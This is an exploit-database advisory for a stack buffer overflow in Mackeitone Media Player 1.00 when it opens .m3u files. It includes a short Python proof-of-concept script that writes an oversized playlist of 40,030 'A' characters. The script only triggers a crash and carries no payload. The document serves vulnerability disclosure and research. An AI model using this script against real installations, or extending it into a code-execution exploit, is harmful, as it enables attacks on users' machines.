Mackeitone Media Player (.m3u file) stack buffer Overflow

vendor:

Media Player

by:

ItSecTeam

9,3

CVSS

HIGH

Stack Buffer Overflow

119

CWE

Product Name: Media Player

Affected Version From: 1.00

Affected Version To: 1.00

Patch Exists: Yes

Related CWE: N/A

CPE: makeitone.net/downloads/MakeitOne-MediaPlayerv1.00.exe

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2020

Mackeitone Media Player (.m3u file) stack buffer Overflow

A stack buffer overflow vulnerability exists in Mackeitone Media Player when processing specially crafted .m3u files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Update to the latest version of Mackeitone Media Player.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# #############################################################################
# Mackeitone Media Player (.m3u file) stack buffer Overflow 
# download link: http://www.makeitone.net/downloads/MakeitOne-MediaPlayerv1.00.exe
# Tested in : Windows XP SP3
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web:  WwW.ITSecTeam.com
# Find by: PLATEN @ ItSecTeam
# Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder 
#        Usage: ./MAckeitone-poc.py
# #############################################################################
#
print """
[~] Mackeitone Media Player (.m3u file) stack  Overflow  poc
[~] mail : Bug@ItSecTeam.com
[~] Web:  WwW.ITSecTeam.com
[~] Find by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam               
"""

data= "\x41" *40030
try:
	file=open("media-poc.m3u",'w')
	file.write( data )
	file.close()
	print   ("[+] File created successfully: media-poc.m3u" )
except:
	print "[-] Error cant write file to system\n"